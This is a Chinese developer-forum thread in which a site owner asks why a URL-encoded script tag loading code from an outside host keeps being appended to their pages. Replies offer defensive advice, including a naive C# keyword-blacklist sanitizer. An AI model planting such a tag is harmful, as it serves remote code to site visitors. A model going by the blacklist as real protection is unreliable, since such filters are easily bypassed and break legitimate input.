62,074
社区成员
发帖
与我相关
我的任务
分享网站被挂JS代码
现有一网站 经常被挂js代码 代码如下 <script src=http://%77%2E%74%6F%79%6F%6E%79%2E%63%6F%6D%2E%63%6E></script>
通常写在html的末尾 此问题以前提过 但是我描述的不够详尽 有人能给解释下 这个是什么原因吗 是怎么引起的这个漏洞 这个漏洞叫什么(最经经常听说sql注入和上传漏洞等 我的属于哪种) 怎么解决?因为经常被挂 所以尽量要求彻底解决(暂时解决的方案也可以 老是删js代码除外 ) 谢谢帮忙
通常写在html的末尾 此问题以前提过 但是我描述的不够详尽 有人能给解释下 这个是什么原因吗 是怎么引起的这个漏洞 这个漏洞叫什么(最经经常听说sql注入和上传漏洞等 我的属于哪种) 怎么解决?因为经常被挂 所以尽量要求彻底解决(暂时解决的方案也可以 老是删js代码除外 ) 谢谢帮忙
...全文
请发表友善的回复…
发表回复
杰子 2009-08-21
- 打赏
- 举报
其实这个问题很简单,不是服务器的问题,就是你的代码的问题,是代码疏忽..
改正代码才是硬道理
把你网址传的值 都过滤一下。非法字符除去
public static string ReplaceBadChar(string strChar)
{
if (strChar.Trim() == "")
{
return "";
}
else
{
strChar = strChar.Replace("'", "");
strChar = strChar.Replace("*", "");
strChar = strChar.Replace("?", "");
strChar = strChar.Replace("(", "");
strChar = strChar.Replace(")", "");
strChar = strChar.Replace("<", "");
strChar = strChar.Replace("=", "");
strChar = strChar.Replace("--", "");
strChar = strChar.Replace("update", "");
strChar = strChar.Replace("script", "");
strChar = strChar.Replace("insert", "");
strChar = strChar.Replace("delete", "");
strChar = strChar.Replace("/", "");
strChar = strChar.Replace("//", "");
return strChar.Trim();
}
}
改正代码才是硬道理
把你网址传的值 都过滤一下。非法字符除去
public static string ReplaceBadChar(string strChar)
{
if (strChar.Trim() == "")
{
return "";
}
else
{
strChar = strChar.Replace("'", "");
strChar = strChar.Replace("*", "");
strChar = strChar.Replace("?", "");
strChar = strChar.Replace("(", "");
strChar = strChar.Replace(")", "");
strChar = strChar.Replace("<", "");
strChar = strChar.Replace("=", "");
strChar = strChar.Replace("--", "");
strChar = strChar.Replace("update", "");
strChar = strChar.Replace("script", "");
strChar = strChar.Replace("insert", "");
strChar = strChar.Replace("delete", "");
strChar = strChar.Replace("/", "");
strChar = strChar.Replace("//", "");
return strChar.Trim();
}
}
lcglvgn 2009-08-21
- 打赏
- 举报
那个帖子我曾经看过 我是个菜鸟 能不能给我详细的讲讲我的到底属于什么漏洞 是由什么引起的 怎么解决 服务器肯定没问题 服务器是租的 基本排除服务器问题
phf0313 2009-08-21
- 打赏
- 举报
帮顶。
杰子 2009-08-21
- 打赏
- 举报
http://topic.csdn.net/u/20090729/14/26381958-0D6E-4B90-BC90-D275E9621F93.html
总结的相当的好
总结的相当的好
owftckb 2009-08-21
- 打赏
- 举报
帮顶了只能
wuyq11 2009-08-21
- 打赏
- 举报
存在SQL注入和上传漏洞,在global里判断条件防止SQL注入。同时数据库操作采用参数化
http://topic.csdn.net/u/20090818/09/80DB1C07-2A0F-4E05-BF3C-585FDEC0D205.html
http://topic.csdn.net/u/20090721/09/5b67c2a7-1dd8-4b54-ba07-b1ada5236a7d.html
http://topic.csdn.net/u/20090818/09/80DB1C07-2A0F-4E05-BF3C-585FDEC0D205.html
http://topic.csdn.net/u/20090721/09/5b67c2a7-1dd8-4b54-ba07-b1ada5236a7d.html
Lovely_baby 2009-08-21
- 打赏
- 举报
结合4楼 和 8 楼的方法 全局就过滤
nbgcqlk 2009-08-21
- 打赏
- 举报
将每个文本框的值进行过滤,比如,他在文本框里输入脚本,你没过滤就会出现那样
mngzilin 2009-08-21
- 打赏
- 举报
在Global中进行全局参数过滤。
狼王_ 2009-08-21
- 打赏
- 举报
友情帮顶
lcglvgn 2009-08-21
- 打赏
- 举报
谁能给我讲下是怎么入侵的吗?
lcglvgn 2009-08-21
- 打赏
- 举报
是跨页面传值引起的。。。。 这个方法就能解决我的问题吗?
